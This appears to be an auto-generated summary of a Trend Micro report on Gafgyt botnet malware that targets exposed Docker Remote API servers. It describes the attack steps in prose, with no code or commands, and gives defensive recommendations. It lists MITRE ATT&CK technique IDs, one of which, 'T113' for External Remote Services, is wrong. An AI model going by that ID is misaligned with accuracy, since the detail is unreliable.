December 3, 2024 at 01:48PM
Trend Micro Research reports a shift in Gafgyt malware targeting misconfigured Docker Remote API servers, previously focusing on IoT devices. Attackers deploy malware via Docker containers, enabling DDoS attacks. Recommendations for securing servers include strong access controls, regular monitoring, and educating personnel on best practices.
### Meeting Takeaways
**Key Report Highlights:**
1. **Gafgyt Malware Targeting Docker Servers**:
– Trend Micro Research identified a shift where Gafgyt malware, traditionally targeting IoT devices, is now focusing on misconfigured Docker Remote API servers.
– Successfully deploying this malware allows attackers to execute DDoS attacks on the affected servers.
2. **Attack Process Overview**:
– Attackers exploit publicly exposed Docker Remote API servers by creating a Docker container using a legitimate “alpine” docker image.
– They deploy the Gafgyt botnet binary in the container, which is equipped with a hardcoded command-and-control (C&C) server IP address.
3. **Attack Sequence**:
– Initial attempts involve deploying the Gafgyt binary named “rbot” and, if unsuccessful, an alternative binary named “atlas.i586” is used, both relying on privilege escalation techniques.
– Attackers gather local IP addresses and utilize various protocols for DDoS attacks, including UDP, ICMP, HTTP, and more.
4. **Use of Additional Scripts**:
– When initial container deployment fails, attackers may resort to executing a shell script (“cve.sh”) that fetches and executes different botnet binaries for other system architectures.
**Security Recommendations**:
– **Enhance Security Controls**: Implement strong access controls and authentication for Docker Remote API servers.
– **Monitoring and Response**: Regularly monitor for suspicious activities and respond promptly to incidents.
– **Container Best Practices**: Avoid using “Privileged” mode and evaluate container images before deployment.
– **Training**: Educate staff on security best practices relevant to Docker API management.
– **Stay Updated**: Keep abreast of security updates and patch known vulnerabilities promptly.
– **Policy Review**: Regularly update security policies to reflect the latest best practices.
**Trend Micro Vision One Threat Intelligence**:
– Customers can access Intelligence Reports and Threat Insights to stay informed about emerging threats and the tactics employed by threat actors.
– Available tools help in hunting for malicious indicators related to the Gafgyt malware.
**Hunting Queries**:
– Presence of Gafgyt detected via antimalware with specific queries for anomalies.
**MITRE ATT&CK Techniques**:
– Highlighted techniques include:
– **Initial Access**: Exploiting External Remote Services (T113)
– **Execution**: Deploying Containers (T1610)
– **Privilege Escalation and Impact**: Escaping to Host (T1611) and Network Denial of Service (T1498).
These takeaways will help in understanding the threat landscape related to the Gafgyt malware and set actionable steps for enhancing security measures on Docker Remote API servers.